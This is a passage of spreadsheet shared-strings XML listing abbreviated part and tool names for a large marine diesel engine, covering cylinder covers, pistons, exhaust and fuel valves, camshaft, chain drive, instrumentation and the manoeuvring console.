  </si>
  <si>
    <t>LIFTING CHAINS,CYL.COVER</t>
  </si>
  <si>
    <t>GRIND.TOOL-EXH.VALVE SEAT</t>
  </si>
  <si>
    <t>GRIND MACHINE,LINER+COVER</t>
  </si>
  <si>
    <t>CYL.COVER SUPPORT,GALLERY</t>
  </si>
  <si>
    <t>GRIND.TOOL,GAS VALVE SEAT</t>
  </si>
  <si>
    <t>MILL+GRIND.WH, FUEL VALVE</t>
  </si>
  <si>
    <t>MILL+GRIND.WHEEL,ST.VALVE</t>
  </si>
  <si>
    <t>SUPPORT F.MANUAL H.P.PUMP</t>
  </si>
  <si>
    <t>HYDR.TIGHT.RING COMPLETE</t>
  </si>
  <si>
    <t>EMRG.HYDR.JACK, CYL.COVER</t>
  </si>
  <si>
    <t>CYL.COVER TIGHTENING TOOL</t>
  </si>
  <si>
    <t>TILT.ATTACHM.F.CYL.COVER</t>
  </si>
  <si>
    <t>MILLING+GRINDING TOOLS</t>
  </si>
  <si>
    <t>SPARE PARTS FOR HYDR.RING</t>
  </si>
  <si>
    <t>ROLLER TOOLS</t>
  </si>
  <si>
    <t>SPRING HOUSING CHECK.TOOL</t>
  </si>
  <si>
    <t>HYDR.NUT CYLINDER COVER</t>
  </si>
  <si>
    <t>TOOLS-CYL.COVER</t>
  </si>
  <si>
    <t>TOOLS-SPARE</t>
  </si>
  <si>
    <t>TOOLS COMPLETE</t>
  </si>
  <si>
    <t>MOUNT. OF CYL. COVER</t>
  </si>
  <si>
    <t>CYLINDER HEAD COVER MOUNT</t>
  </si>
  <si>
    <t>INLET DUCT CROSS.SEC.</t>
  </si>
  <si>
    <t>CYL. COVER ASSEMBLY</t>
  </si>
  <si>
    <t>CYLINDER COVER SECTIONS</t>
  </si>
  <si>
    <t>EXH. DUCT CROSS. SEC.</t>
  </si>
  <si>
    <t>CRANKSHAFT COMPLETE</t>
  </si>
  <si>
    <t>TEST BED, FATIGUE MASHINE</t>
  </si>
  <si>
    <t>VIBRATION DAMPER-MOUNTING</t>
  </si>
  <si>
    <t>MOUNT GEARWH.+THROW RING</t>
  </si>
  <si>
    <t>RESILIENT GEARING</t>
  </si>
  <si>
    <t>MOUNT. OF FLEX.GEAR WHEEL</t>
  </si>
  <si>
    <t>AUTOLOG,MEASURING TOOL</t>
  </si>
  <si>
    <t>MEAS.INSTR.,AX.VIBR.DAMP.</t>
  </si>
  <si>
    <t>TOOLS FOR DETUNER</t>
  </si>
  <si>
    <t>HYDR.JACK COUNTERWEIGHT</t>
  </si>
  <si>
    <t>HOF FITTED BOLT</t>
  </si>
  <si>
    <t>TOOLS FOR MS-07</t>
  </si>
  <si>
    <t>MOUNT. OF CRANKSHAFT</t>
  </si>
  <si>
    <t>MOUNT. CHAINWH.CRANKSHAFT</t>
  </si>
  <si>
    <t>MOUNT. OF COUNTER WEIGHT</t>
  </si>
  <si>
    <t>MOUNT. OF FLEX. GEARWHEEL</t>
  </si>
  <si>
    <t>MOUNT. OF VIB. DAMPER</t>
  </si>
  <si>
    <t>MOUNTING OF TUNING WHEEL</t>
  </si>
  <si>
    <t>CONNECTING ROD+CROSSHEAD</t>
  </si>
  <si>
    <t>CON.ROD ARR. WITHOUT SHIM</t>
  </si>
  <si>
    <t>ALARM (SAAB)</t>
  </si>
  <si>
    <t>BOOSTER PUMP FOR CONN.ROD</t>
  </si>
  <si>
    <t>CROSSHEAD BEARING NON-STD</t>
  </si>
  <si>
    <t>CONN.ROD BEARING NON-STD</t>
  </si>
  <si>
    <t>CONN.ROD,BORING F.BEA.CAP</t>
  </si>
  <si>
    <t>COLLAR FOR CONNECTING ROD</t>
  </si>
  <si>
    <t>CONNECTING ROD BRACING</t>
  </si>
  <si>
    <t>RETAINING TOOL-CONN. ROD</t>
  </si>
  <si>
    <t>BLOCKING OF OIL SUPPLY</t>
  </si>
  <si>
    <t>TOOLS-LOCK.OF CONN. ROD</t>
  </si>
  <si>
    <t>RAIL (TOOLS)</t>
  </si>
  <si>
    <t>EXTRACTING TOOL</t>
  </si>
  <si>
    <t>WIRE GUIDE</t>
  </si>
  <si>
    <t>TOOLS FOR SUPPORTING</t>
  </si>
  <si>
    <t>LIFTING TOOL CRANKBEARING</t>
  </si>
  <si>
    <t>GUIDE FORK</t>
  </si>
  <si>
    <t>RETAINING TOOL,X-HEAD BRG</t>
  </si>
  <si>
    <t>RETAINING TOOL,X-HEAD PIN</t>
  </si>
  <si>
    <t>LIFT.TOOL,CRANKPIN SHELL</t>
  </si>
  <si>
    <t>RET. TOOL TELESCOPE PIPE</t>
  </si>
  <si>
    <t>CHAIN-SUSPENDING X-HEAD</t>
  </si>
  <si>
    <t>CROSSBAR,DISM.OF.CONN.ROD</t>
  </si>
  <si>
    <t>HYDR.JACK CONN.ROD</t>
  </si>
  <si>
    <t>TOOLS FOR MS-108</t>
  </si>
  <si>
    <t>SUPPORT MADE OF PLATE</t>
  </si>
  <si>
    <t>INSTR.PLATE COUNT.WEIGHT</t>
  </si>
  <si>
    <t>GUIDE SHOE SELECTION</t>
  </si>
  <si>
    <t>SUPPORT FOR PISTON ROD</t>
  </si>
  <si>
    <t>EYE NUT F.PISTON ROD STUD</t>
  </si>
  <si>
    <t>RETAINING TOOL</t>
  </si>
  <si>
    <t>TOOL F.MOUNTING OF SPRING</t>
  </si>
  <si>
    <t>CONE RING</t>
  </si>
  <si>
    <t>LIFT.F.PISTON ROD FOOT</t>
  </si>
  <si>
    <t>WORKTABLE TOPPLATE</t>
  </si>
  <si>
    <t>EXTRACTOR FOR GUIDE SHOE</t>
  </si>
  <si>
    <t>HYDR.JACK CROSSHEAD END</t>
  </si>
  <si>
    <t>HYDR.JACK CROSSHEAD</t>
  </si>
  <si>
    <t>TRANSPORT TOOL-CROSSHEAD</t>
  </si>
  <si>
    <t>EYE SCREW-LIFT.TOOL-XHEAD</t>
  </si>
  <si>
    <t>LIFTING TOOL-CROSSHEAD</t>
  </si>
  <si>
    <t>INSERT FOR PISTON LOWER P</t>
  </si>
  <si>
    <t>BOTTOM PISTON</t>
  </si>
  <si>
    <t>PISTON+ROD+STUFFING BOX</t>
  </si>
  <si>
    <t>PISTON+PISTON ROD</t>
  </si>
  <si>
    <t>PISTON WITH PIN</t>
  </si>
  <si>
    <t>PISTON CROWN WITH STUDS</t>
  </si>
  <si>
    <t>PISTON CROWN SELECTION</t>
  </si>
  <si>
    <t>PISTON RING, ASSY</t>
  </si>
  <si>
    <t>PISTON RING, SELECT.TABLE</t>
  </si>
  <si>
    <t>COLLAR F. LIFT. OF PISTON</t>
  </si>
  <si>
    <t>WELDED SUPPORT RING</t>
  </si>
  <si>
    <t>CHAIN F.SUSPENDING PISTON</t>
  </si>
  <si>
    <t>COLLAR RING, STUFFING BOX</t>
  </si>
  <si>
    <t>TOOLS FOR TILTED LIFT</t>
  </si>
  <si>
    <t>PISTON RING EXPANDER, SET</t>
  </si>
  <si>
    <t>COLLAR RING FOR PISTON</t>
  </si>
  <si>
    <t>PRESS TEST TOOLS (PARTS)</t>
  </si>
  <si>
    <t>PRESSURE TEST TOOL,PISTON</t>
  </si>
  <si>
    <t>SUPPORT IRON FOR PISTON</t>
  </si>
  <si>
    <t>HYDR.JACK PISTON ROD</t>
  </si>
  <si>
    <t>OIL PAN-PISTON(TOOLS)</t>
  </si>
  <si>
    <t>HYDR.JACK PISTON CROWN</t>
  </si>
  <si>
    <t>TOOLS FOR MS-110</t>
  </si>
  <si>
    <t>PISTON COOLING</t>
  </si>
  <si>
    <t>BUSHING WITH WHITE METAL</t>
  </si>
  <si>
    <t>STUFF.BOX,TELESCOPIC PIPE</t>
  </si>
  <si>
    <t>PROTECTIVE TUBE ASSEMBLY</t>
  </si>
  <si>
    <t>SLIT PIPE COMPLETE</t>
  </si>
  <si>
    <t>HOUSING-AIR RECEIVER</t>
  </si>
  <si>
    <t>PIPE WITH FLANGE</t>
  </si>
  <si>
    <t>EXHAUST VALVE-COMPLETE</t>
  </si>
  <si>
    <t>VALVE SCREW</t>
  </si>
  <si>
    <t>ORIFICE PIPE, ARRANGEMENT</t>
  </si>
  <si>
    <t>ROTATING MECHANISM</t>
  </si>
  <si>
    <t>SPRING CROSSPIECE</t>
  </si>
  <si>
    <t>STUD, SCREW AND DISC</t>
  </si>
  <si>
    <t>WASHER PLATE</t>
  </si>
  <si>
    <t>SEALING AIR CONTROL UNIT</t>
  </si>
  <si>
    <t>SEAL.AIR.CONTR.UNIT,COMPL</t>
  </si>
  <si>
    <t>SEALING 0IL CONTROL UNIT</t>
  </si>
  <si>
    <t>SEAL.OIL.CONTR.UNIT,COMPL</t>
  </si>
  <si>
    <t>ACTUATOR COMPLETE, INVA</t>
  </si>
  <si>
    <t>PNEUM.EXH.VAL.AIR SUPPLY</t>
  </si>
  <si>
    <t>ACTUATOR+THROTTLE VALVE</t>
  </si>
  <si>
    <t>ACTUATOR CYLINDER+PISTON</t>
  </si>
  <si>
    <t>ACTUAT.COV.+FLOW CL.N.R.V</t>
  </si>
  <si>
    <t>FLOW CLEAN. NON RETURN V.</t>
  </si>
  <si>
    <t>VALVE SPINDLE ASSY</t>
  </si>
  <si>
    <t>VALVE-MOUNTING</t>
  </si>
  <si>
    <t>THRUST PIECE-MOUNT.TOOL</t>
  </si>
  <si>
    <t>VALVE SEAT+SPIND GRINDER</t>
  </si>
  <si>
    <t>COLLAR RING-EXH.VALVE</t>
  </si>
  <si>
    <t>WORKTABLE-EXHAUST VALVE</t>
  </si>
  <si>
    <t>HYDR.JACK EXH. VALVE</t>
  </si>
  <si>
    <t>GRINDING TOOL-HP PIPE</t>
  </si>
  <si>
    <t>CUTTER TOOL</t>
  </si>
  <si>
    <t>LIFTING TOOL, EXH.VALVE</t>
  </si>
  <si>
    <t>TABLE FOR WORKTABLE</t>
  </si>
  <si>
    <t>FRAME FOR WORKTABLE</t>
  </si>
  <si>
    <t>TOOLS FOR DISMANTLING</t>
  </si>
  <si>
    <t>TOOLS F.DISMANTL.(DETAIL)</t>
  </si>
  <si>
    <t>TEST RIG FOR SAFETY VALVE</t>
  </si>
  <si>
    <t>CONV.SET, EXH.VALVE TOOLS</t>
  </si>
  <si>
    <t>TEST EQUIPMENT, EXH.VALVE</t>
  </si>
  <si>
    <t>EXH.VALVE OPENING TOOL</t>
  </si>
  <si>
    <t>TOOL-DISM.EXH.V.BOT.PIECE</t>
  </si>
  <si>
    <t>TOOL FOR HYDRAULIC PISTON</t>
  </si>
  <si>
    <t>EXTRACTOR F. EXH. BUSHING</t>
  </si>
  <si>
    <t>TOOLS-EXHAUST VALVE</t>
  </si>
  <si>
    <t>BRIDGE GAUGE,EXH.VALVE</t>
  </si>
  <si>
    <t>EXHAUST VALVE-REPAIR</t>
  </si>
  <si>
    <t>VALVE GEAR ASSEMBLY</t>
  </si>
  <si>
    <t>BASE PLATE FOR HCU -WELDING</t>
  </si>
  <si>
    <t>FUEL OIL PRESSURE BOOSTER</t>
  </si>
  <si>
    <t>PUMP BARREL COMPLETE</t>
  </si>
  <si>
    <t>PLUG VALVE</t>
  </si>
  <si>
    <t>TEST EQUIP F ACCUMULATERS</t>
  </si>
  <si>
    <t>SHUT DOWN VALVE</t>
  </si>
  <si>
    <t>TOOLS F.GAS CONTROL BLOCK</t>
  </si>
  <si>
    <t>FUEL VALVE-FUEL NOZZLE</t>
  </si>
  <si>
    <t>FUEL VALVE-SLIT FILTER</t>
  </si>
  <si>
    <t>FUEL VALVE DUMMY</t>
  </si>
  <si>
    <t>THRUST SPINDLE</t>
  </si>
  <si>
    <t>CYLINDER HEAD</t>
  </si>
  <si>
    <t>CYLINDER HEAD WITH PISTON</t>
  </si>
  <si>
    <t>FUEL VALVE TEST</t>
  </si>
  <si>
    <t>MOUNTING OF SPINDLE+SLIDE</t>
  </si>
  <si>
    <t>SPINDLE G.+NON-RETURN V.</t>
  </si>
  <si>
    <t>FUEL NOZZLE, ASSEMBLY</t>
  </si>
  <si>
    <t>VENT SCREW WITH BALL</t>
  </si>
  <si>
    <t>FEELER PIN ASSEMBLING</t>
  </si>
  <si>
    <t>TIGHTENING DEVICE</t>
  </si>
  <si>
    <t>JET CONTROL SCREEN, ASSY</t>
  </si>
  <si>
    <t>PRESSURE TEST TOOLS</t>
  </si>
  <si>
    <t>MOUNTING OF THRUST PIECE</t>
  </si>
  <si>
    <t>TEST RIG - FUEL VALVE</t>
  </si>
  <si>
    <t>PRESSURE TEST TUBE, ASSY</t>
  </si>
  <si>
    <t>TEST FIXTURE-FUEL VALVE</t>
  </si>
  <si>
    <t>MILL.TOOL-SEAT-F.OIL PIPE</t>
  </si>
  <si>
    <t>MILLING AND GRINDING TOOL</t>
  </si>
  <si>
    <t>EXTRACTOR-SPINDLE GUIDE</t>
  </si>
  <si>
    <t>TOOLS FOR FUEL VALVE</t>
  </si>
  <si>
    <t>EXTRACTOR+DRIFT, ATOMIZER</t>
  </si>
  <si>
    <t>FUEL VALVE MOUNTING</t>
  </si>
  <si>
    <t>FUEL GAS VALVE</t>
  </si>
  <si>
    <t>TOOLS FOR GAS VALVES</t>
  </si>
  <si>
    <t>TOOLS F.GAS INJ.VALVE</t>
  </si>
  <si>
    <t>TEST RIG-GAS VALVE</t>
  </si>
  <si>
    <t>METAL JACKET</t>
  </si>
  <si>
    <t>START.AIR PIPE-SAFETY CAP</t>
  </si>
  <si>
    <t>SAFETY CAP</t>
  </si>
  <si>
    <t>PIN WRENCH-STARTING VALVE</t>
  </si>
  <si>
    <t>STARTING VALVE ARR.</t>
  </si>
  <si>
    <t>MOUNT. OF STARTING VALVE</t>
  </si>
  <si>
    <t>TEST EQMT.,COMB.SAFETY V.</t>
  </si>
  <si>
    <t>VALVE SPINDLE COMPLETE</t>
  </si>
  <si>
    <t>SAFETY-A. INDICATOR V.ARR</t>
  </si>
  <si>
    <t>ARR.OF CONTR. OIL HP-PIPE</t>
  </si>
  <si>
    <t>THRUST PIECE MOUNTING</t>
  </si>
  <si>
    <t>ROCKER ARM COMPLETE</t>
  </si>
  <si>
    <t>BRACKET ROCKER ARM COMPL.</t>
  </si>
  <si>
    <t>ROLLER GUIDE BEARING EXH.</t>
  </si>
  <si>
    <t>ROLLER GUIDE COMPLETE</t>
  </si>
  <si>
    <t>ROLLER GUIDE W.ROLL.BEAR.</t>
  </si>
  <si>
    <t>PUSH ROD ASSEMBLY</t>
  </si>
  <si>
    <t>PUSH ROD COMPLETE</t>
  </si>
  <si>
    <t>SAFETY LOCK-PUSH ROD</t>
  </si>
  <si>
    <t>PIPE-PUSH ROD</t>
  </si>
  <si>
    <t>HYDRAULIC PIPE COMPLETE</t>
  </si>
  <si>
    <t>HOSE COMPLETE</t>
  </si>
  <si>
    <t>PUNCTURE VALVE</t>
  </si>
  <si>
    <t>GUIDE FOR PUSH ROD</t>
  </si>
  <si>
    <t>SUPPORT FOR GUIDE</t>
  </si>
  <si>
    <t>ROCKER ARMS MOUNTING</t>
  </si>
  <si>
    <t>LIFTING TOOL,ROLLER GUIDE</t>
  </si>
  <si>
    <t>LIFTING TOOL-ROLLER GUIDE</t>
  </si>
  <si>
    <t>GRINDING TOOL-H.P. PIPE</t>
  </si>
  <si>
    <t>LIFT.TOOL-ROLL.G.-EXH.VAL</t>
  </si>
  <si>
    <t>LIFT.TOOL-ROLL.G.FUEL P.</t>
  </si>
  <si>
    <t>EXTRACTOR F. SAFETY VALVE</t>
  </si>
  <si>
    <t>TEST EQUIPMENT - ACTUATOR</t>
  </si>
  <si>
    <t>FUEL PUMP DRIVE ASSEMBLY</t>
  </si>
  <si>
    <t>TOOLS F.PUNCTURE VALVE</t>
  </si>
  <si>
    <t>MOUNTING OF CAMSHAFT</t>
  </si>
  <si>
    <t>SHAFT FOR REVERSING</t>
  </si>
  <si>
    <t>CAMSHAFT (U50)</t>
  </si>
  <si>
    <t>INSTR.PLATE COUPL.CAMSHA.</t>
  </si>
  <si>
    <t>CAMSHAFT COMPLETE</t>
  </si>
  <si>
    <t>CAMSHAFT BEARING,MOUNTING</t>
  </si>
  <si>
    <t>COLLAR RING FOR CAMSHAFT</t>
  </si>
  <si>
    <t>GUIDE TOOLS-CAMSHAFT</t>
  </si>
  <si>
    <t>LIFTING TOOL F.OIL PAN</t>
  </si>
  <si>
    <t>PULLEY F.WIRE F.CAMSH.BRG</t>
  </si>
  <si>
    <t>LIFT ATTACH CAMSHAFT BRG.</t>
  </si>
  <si>
    <t>TOOLS-POLISHING OF CAMS</t>
  </si>
  <si>
    <t>CAMSHAFT ASSEMBLY</t>
  </si>
  <si>
    <t>CAMSHAFT SECTION</t>
  </si>
  <si>
    <t>CONSOLE COMPLETE</t>
  </si>
  <si>
    <t>BEARING FOR CAMSHAFT</t>
  </si>
  <si>
    <t>STOP CYLINDER</t>
  </si>
  <si>
    <t>PIPES-STOP CYLINDER</t>
  </si>
  <si>
    <t>FUEL PUMP ROLLER GUIDE</t>
  </si>
  <si>
    <t>ROLLER GUIDE BEARING FUEL</t>
  </si>
  <si>
    <t>INVA ACTUATOR</t>
  </si>
  <si>
    <t>DISTRIBUTOR BLOCK COMPL.</t>
  </si>
  <si>
    <t>GAS SPRING COMPLETE</t>
  </si>
  <si>
    <t>CHECK VALVE ARR.</t>
  </si>
  <si>
    <t>OIL PAN, FORE</t>
  </si>
  <si>
    <t>OIL PAN, AFT</t>
  </si>
  <si>
    <t>BEARING HOUSING-SET</t>
  </si>
  <si>
    <t>NECK,ROLLER GUIDE</t>
  </si>
  <si>
    <t>END BEARING</t>
  </si>
  <si>
    <t>FLANGE SUSPENSION</t>
  </si>
  <si>
    <t>BRACKET F.FUEL P.&amp;EXH.ACT</t>
  </si>
  <si>
    <t>ARR.OF REVERSING MECH.</t>
  </si>
  <si>
    <t>ARM. FOR REVERSING COMPL.</t>
  </si>
  <si>
    <t>FUEL OIL SEALING ARR.</t>
  </si>
  <si>
    <t>LIFT. TOOL-ROLLERG.-EXH.V</t>
  </si>
  <si>
    <t>LIFT.TOOL-ROLL.G.-FUEL P.</t>
  </si>
  <si>
    <t>HEX.SPANNER,LIFT ROL.GDE</t>
  </si>
  <si>
    <t>MECH.JACK-ROLLER GUIDE</t>
  </si>
  <si>
    <t>HYDR.JACK CAMSHAFT BRG.</t>
  </si>
  <si>
    <t>COMPRES TOOL FUEL&amp;EXH.SPR</t>
  </si>
  <si>
    <t>TOOLS FOR MS-35</t>
  </si>
  <si>
    <t>MOUNT.OF CAMSHAFT BEARING</t>
  </si>
  <si>
    <t>GEARBOX, MOUNT ON ENGINE</t>
  </si>
  <si>
    <t>GEARBOX ASSEMBLY</t>
  </si>
  <si>
    <t>GEARBOX LOWERPART</t>
  </si>
  <si>
    <t>GEARBOX UPPERPART</t>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT ASSY.</t>
  </si>
  <si>
    <t>MOUNT. OF DRIVE SHAFT</t>
  </si>
  <si>
    <t>GEARBOX LOWERPART, WELDED</t>
  </si>
  <si>
    <t>GEARBOX UPPERPART, WELDED</t>
  </si>
  <si>
    <t>HYDR.OIL INLET, LOW PRESS</t>
  </si>
  <si>
    <t>HYDR.OIL OUTLET, LOW PRESS</t>
  </si>
  <si>
    <t>HYDR.OIL OUTLET, HIGH P.</t>
  </si>
  <si>
    <t>SHIELD, SPRAY PROTECTION</t>
  </si>
  <si>
    <t>HYDR.PUMP STATION</t>
  </si>
  <si>
    <t>HYDR. CYLINDER UNIT</t>
  </si>
  <si>
    <t>HYDR. LOW PRESS.SUPPL.SYS</t>
  </si>
  <si>
    <t>HYDR. SAFETY &amp; ACCU.BLOCK</t>
  </si>
  <si>
    <t>CHAIN DRIVE LOWER PART</t>
  </si>
  <si>
    <t>CHAIN DRIVE</t>
  </si>
  <si>
    <t>PIPE WITH FUNNEL</t>
  </si>
  <si>
    <t>TELESCOPE PIPE</t>
  </si>
  <si>
    <t>CHAIN WHEEL ON CAMSHAFT</t>
  </si>
  <si>
    <t>HUB WITH BRAKE DISC</t>
  </si>
  <si>
    <t>SPRING STOP COMPLETE</t>
  </si>
  <si>
    <t>SLIDING SLEEVE WITH NUT</t>
  </si>
  <si>
    <t>MOUNT.CHAINWHEEL ON CAMSH</t>
  </si>
  <si>
    <t>SUPPL.F.REVERSING MECHAN.</t>
  </si>
  <si>
    <t>CHAIN TIGHTENER MOUNTING</t>
  </si>
  <si>
    <t>DISTANCE BRACKET</t>
  </si>
  <si>
    <t>BRACKET-CHAIN TIGHTENER</t>
  </si>
  <si>
    <t>SPRING WITH DATA PLATE</t>
  </si>
  <si>
    <t>SIDE PLATE AND SHAFT</t>
  </si>
  <si>
    <t>TIGHTENING BOLT AND SHAFT</t>
  </si>
  <si>
    <t>SIDE PLATES COMPLETE</t>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT MOUNT.</t>
  </si>
  <si>
    <t>SHAFT WITH CHAIN WHEEL</t>
  </si>
  <si>
    <t>INTERMEDIATE SHAFT COMPL.</t>
  </si>
  <si>
    <t>GOVERNOR DRIVE</t>
  </si>
  <si>
    <t>MOUNT.OF GUIDEWAY</t>
  </si>
  <si>
    <t>DAMPING OF BLOCK BEARING</t>
  </si>
  <si>
    <t>LUBRICATOR DRIVE</t>
  </si>
  <si>
    <t>GEAR FOR LUBRICATOR DRIVE</t>
  </si>
  <si>
    <t>IDLERS ASSEMBLY</t>
  </si>
  <si>
    <t>MOUNT.OF GEARWHEEL DRIVE</t>
  </si>
  <si>
    <t>LIFT TOOL,HYDRAULIC MOTOR</t>
  </si>
  <si>
    <t>TOOLS FOR MS-112</t>
  </si>
  <si>
    <t>DISTAN.PIECE-CHAIN TIGHT.</t>
  </si>
  <si>
    <t>MEC.JACK F.EMERGENCY REV.</t>
  </si>
  <si>
    <t>HYDR. TOOLS - CHAIN DRIVE</t>
  </si>
  <si>
    <t>LIFT.TOOL-HYDR.MOTOR</t>
  </si>
  <si>
    <t>GUIDE FOR MOUNT. OF CHAIN</t>
  </si>
  <si>
    <t>PIN GAUGE 1 ORDER MO.COMP</t>
  </si>
  <si>
    <t>TOOLS F.EMERGENCY REVERS.</t>
  </si>
  <si>
    <t>HOLDER-PNEUM.GRIND.MACH.</t>
  </si>
  <si>
    <t>MILL.TOOL, REV-CRANK</t>
  </si>
  <si>
    <t>GUIDE - MILLING TOOL</t>
  </si>
  <si>
    <t>INTERMED. WHEEL ASSEMBLY</t>
  </si>
  <si>
    <t>MOUNT.GEARWHEEL+THROWRING</t>
  </si>
  <si>
    <t>REPAIR CAMS</t>
  </si>
  <si>
    <t>REPAIR CAM - EXHAUST</t>
  </si>
  <si>
    <t>REPAIR CAM - FUEL</t>
  </si>
  <si>
    <t>BRACK.F.OIL MIST DETECTOR</t>
  </si>
  <si>
    <t>REMOTE PRESSURE GAUGE</t>
  </si>
  <si>
    <t>THRUST BEARING CONTROL</t>
  </si>
  <si>
    <t>MAIN BEARING-SUPERVISION</t>
  </si>
  <si>
    <t>CENTRAL LUBRICAT.CONTROL</t>
  </si>
  <si>
    <t>DRAIN-CYL.COVER CHECKING</t>
  </si>
  <si>
    <t>PISTON COOL.OIL-CONTROL</t>
  </si>
  <si>
    <t>PRESSURE CONVERTER</t>
  </si>
  <si>
    <t>REMOTE INDICATOR</t>
  </si>
  <si>
    <t>PRESSURE GAUGE PIPES</t>
  </si>
  <si>
    <t>BRACKET-REMOTE THERMOM.</t>
  </si>
  <si>
    <t>FRAME FOR PRESSURE GAUGE</t>
  </si>
  <si>
    <t>SUPPORT-PRESS.GAUGE PANEL</t>
  </si>
  <si>
    <t>INSTRUMENT.-LUBR.OIL TC</t>
  </si>
  <si>
    <t>INSTRUMENTATION-SPECIAL</t>
  </si>
  <si>
    <t>REMOTE CONTROLS</t>
  </si>
  <si>
    <t>EQUIPMENT</t>
  </si>
  <si>
    <t>FLOW CONTROLLER</t>
  </si>
  <si>
    <t>ORDERLIST OIL MIST DETECT</t>
  </si>
  <si>
    <t>ARR.OF THERMOSTAT</t>
  </si>
  <si>
    <t>MOUNTINGS-THERMOSTAT BOX</t>
  </si>
  <si>
    <t>SUPPORT-PRESSURE STAT</t>
  </si>
  <si>
    <t>CONNECTING POINTS</t>
  </si>
  <si>
    <t>SUSPENSION-PRESS.CONVER.</t>
  </si>
  <si>
    <t>THERMOSTAT</t>
  </si>
  <si>
    <t>THERMO FEELER</t>
  </si>
  <si>
    <t>REMOTE INSTRUMENTS</t>
  </si>
  <si>
    <t>FEELER</t>
  </si>
  <si>
    <t>TEMPERATURE SWITCH</t>
  </si>
  <si>
    <t>W.MIST CATCHER,LEVEL IND.</t>
  </si>
  <si>
    <t>SUPPORT-OIL MIST DETECTOR</t>
  </si>
  <si>
    <t>CYL.LINER WALL TEMP.SENS.</t>
  </si>
  <si>
    <t>INSTR.PR.GAUGES &amp; THERM.</t>
  </si>
  <si>
    <t>INSTRUMENTATION-EL.COMP.</t>
  </si>
  <si>
    <t>WIRING, EL. INSTRUMENTS</t>
  </si>
  <si>
    <t>PMI, SYSTEM</t>
  </si>
  <si>
    <t>PMI, CYL.PRESS.MONITORING</t>
  </si>
  <si>
    <t>PICK-UP COMPLETE</t>
  </si>
  <si>
    <t>MOUNTING OF ENCODER</t>
  </si>
  <si>
    <t>BRACKET, MOUNT.OF ENCODER</t>
  </si>
  <si>
    <t>TACHOMETER, TURBOCHARGER</t>
  </si>
  <si>
    <t>VIBRATION MONITORING, T/C</t>
  </si>
  <si>
    <t>MOUNT. OF STARTING BOX</t>
  </si>
  <si>
    <t>MOUNT. OF PT 100 SENSOR</t>
  </si>
  <si>
    <t>MOUNT. OF EL-PIPE/CABLE</t>
  </si>
  <si>
    <t>MOUNT. OF NI-CR/NI SENSOR</t>
  </si>
  <si>
    <t>SPEED CONTROL BOX</t>
  </si>
  <si>
    <t>H.T. WATER PREHEATER BOX</t>
  </si>
  <si>
    <t>PIPE FOR T+P CABLES</t>
  </si>
  <si>
    <t>ARR. OF PRESSOSTATE</t>
  </si>
  <si>
    <t>ARR. OF DIFF. PRESSOSTATE</t>
  </si>
  <si>
    <t>ARR.OF PRESS. TRANSMITTER</t>
  </si>
  <si>
    <t>MOUNT. OF PICK-UP</t>
  </si>
  <si>
    <t>MOUN.OF BLOW/BACK MONITOR</t>
  </si>
  <si>
    <t>P.BARREL+TOP COVER-COMPL.</t>
  </si>
  <si>
    <t>SUCTION VALVE</t>
  </si>
  <si>
    <t>FUEL PUMP W.ACCUMULATOR</t>
  </si>
  <si>
    <t>ACCUMULATOR PISTON COMPL.</t>
  </si>
  <si>
    <t>GOVERNOR LEVER</t>
  </si>
  <si>
    <t>SEALING HOUSING COMPLETE</t>
  </si>
  <si>
    <t>TOPCOVER WITH PUNCT.VALVE</t>
  </si>
  <si>
    <t>ACTUATOR WITH FLANGE</t>
  </si>
  <si>
    <t>PUMP HOUSING WITH BARREL</t>
  </si>
  <si>
    <t>PUMP HOUSING WITH PLUNGER</t>
  </si>
  <si>
    <t>INTERMEDIATE PIECE COMPL.</t>
  </si>
  <si>
    <t>FUEL PUMP WITH ACTUATOR</t>
  </si>
  <si>
    <t>BUFFER POINTER</t>
  </si>
  <si>
    <t>ASSY OF SAFETY VALVE</t>
  </si>
  <si>
    <t>FLEXIBLE CONNECTION</t>
  </si>
  <si>
    <t>COMB.PUNCTURE+SUCT.VALVE</t>
  </si>
  <si>
    <t>LIFT.TOOL F.HYDR.PLUNGER</t>
  </si>
  <si>
    <t>LIFTING TOOL F. FUEL PUMP</t>
  </si>
  <si>
    <t>TOOL F.SCRAPER RING MOUNT</t>
  </si>
  <si>
    <t>LIFT.TOOL-FUEL PUMP HOUS.</t>
  </si>
  <si>
    <t>FOOT FOR LIFTING TOOLS</t>
  </si>
  <si>
    <t>TOOL-P.MAX RACK</t>
  </si>
  <si>
    <t>EXTRACT.TOOL-SUCT.VALVE</t>
  </si>
  <si>
    <t>TOOL,TIGHTN.PUNCTUREVALVE</t>
  </si>
  <si>
    <t>PULLING TOOL,VIT RACK</t>
  </si>
  <si>
    <t>REAMER-FUEL PUMP HOUSING</t>
  </si>
  <si>
    <t>SPACER, TOOTHED RACK</t>
  </si>
  <si>
    <t>TOOLS-MOUNT.SEALS-FUEL P.</t>
  </si>
  <si>
    <t>SEALS TOOL, PUMP BARREL</t>
  </si>
  <si>
    <t>SEALS TOOL, PLUNGER</t>
  </si>
  <si>
    <t>SEALS TOOL, SUCTION VALVE</t>
  </si>
  <si>
    <t>SEALS TOOL, AIR PISTON</t>
  </si>
  <si>
    <t>SEALS TOOL, TOP COVER</t>
  </si>
  <si>
    <t>TOOLS FOR MS-136</t>
  </si>
  <si>
    <t>PLUNGER COMPLETE</t>
  </si>
  <si>
    <t>PIPES-MANOEUVRING CONSOLE</t>
  </si>
  <si>
    <t>SUPPL.DRAW.-MAN. CONSOLE</t>
  </si>
  <si>
    <t>ASSY OF PRESS.GAUGE PIPE</t>
  </si>
  <si>
    <t>PLATE W.PNEUMATIC COMP.</t>
  </si>
  <si>
    <t>ASSY OF EL.MECH.INTERL..</t>
  </si>
  <si>
    <t>ASSY OF EL.MECH.INTERL.</t>
  </si>
  <si>
    <t>BOX WITH RELAYS</t>
  </si>
  <si>
    <t>ASSY OF SOLENOID VALVES</t>
  </si>
  <si>
    <t>ARR.OF SWITCHES</t>
  </si>
  <si>
    <t>REGULATING HANDLE COMPL.</t>
  </si>
  <si>
    <t>STANDARD COMPONENTS</t>
  </si>
  <si>
    <t>ARRANGEMENT OF LAMPS</t>
  </si>
  <si>
    <t>MIMIC DIAGRAM</t>
  </si>
  <si>
    <t>MANOEUVRING PANEL</t>
  </si>
  <si>
    <t>ALARM SLOW DOWN PANEL</t>
  </si>
  <si>
    <t>SPEED SETTING UNIT</t>
  </si>
  <si>
    <t>EMERGENCY TELEGRAPH</t>
  </si>
  <si>
